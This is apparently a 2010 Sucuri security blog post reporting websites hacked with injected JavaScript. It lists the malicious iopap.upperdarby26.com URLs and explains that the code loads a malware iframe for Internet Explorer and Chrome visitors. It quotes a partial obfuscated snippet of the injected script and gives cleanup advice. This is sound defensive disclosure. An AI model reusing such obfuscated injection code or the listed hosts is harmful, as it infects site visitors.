Web sites hacked with malware from iopap.upperdarby26.com

  • June 22, 2010

We are seeing today a good number of sites hacked with malware from http://iopap.upperdarby26.com. The malicious javascript is added to the bottom of every index.php file and to the bottom of a few javascript files as well.

The malware is getting loaded from a few different files, all with the same content:

http://iopap.upperdarby26.com/FIFO.js
http://iopap.upperdarby26.com/Web_Ring.js
http://iopap.upperdarby26.com/Real-Time.js
http://iopap.upperdarby26.com/Applet1.html
..
http://iopap.upperdarby26.com/Infotainment.js


The good news is that Google already blacklisted this domain, so it won’t affect most users. As far as the code itself, it generates an iframe on the infected site, which will load the malware from http://iopap.upperdarby26.com:8080/index.php. It is interesting that it checks the browser being used and will only attempt to infect Internet Explorer and Google Chrome users.

try{ Qfygq4h5tym = ”; Ukpckqd7dzaz37d9e = [‘height’, ‘width’]; Srbx29lfsp1vhizv = document.referrer;
M89l8krh3jas5 = ‘h ^ t H t p ! : % / H / H i H o ^ p % a > p H . % u ^ p ! p % e H r ! d ! a H r > b > y ^ 2 > 6 % . ! c ^ o H m ! : > 8 > 0 > 8 ^ 0 % / ^ i ! n ^ d > e > x H . ! p H h % p % ?% p % i % d ! = ^ 1 > & H J > l ^ q H k % x > 7 ! 8 H a > e ! l ! h % 0 % y > 4 H 5 H = ! 1 ! & ^ m > = H 1 > ‘.replace(/[>%!H^]/g, ”)..

Sites affected: No specific web host or application is being targeted, so we are thinking the attackers are using stolen FTP credentials to hack the sites. If your site got hacked, remove the offending code from the index/javascript files and change your passwords ASAP. It might be good to clean your desktop (run a virus scan) to make sure your destkop didn’t get compromised.

If your site has been hacked (or has malware), and you need help, send us an email to support@sucuri.net or visit our site: Sucuri Security. We can get it cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
3 comments
  1. Pingback: Tweets that mention Web sites hacked with malware from iopap.upperdarby26.com | Sucuri Security -- Topsy.com
  3. Pingback: kollinsoy.skyefenton.com attack? - Admins Goodies

Comments are closed.

Related Categories
You May Also Like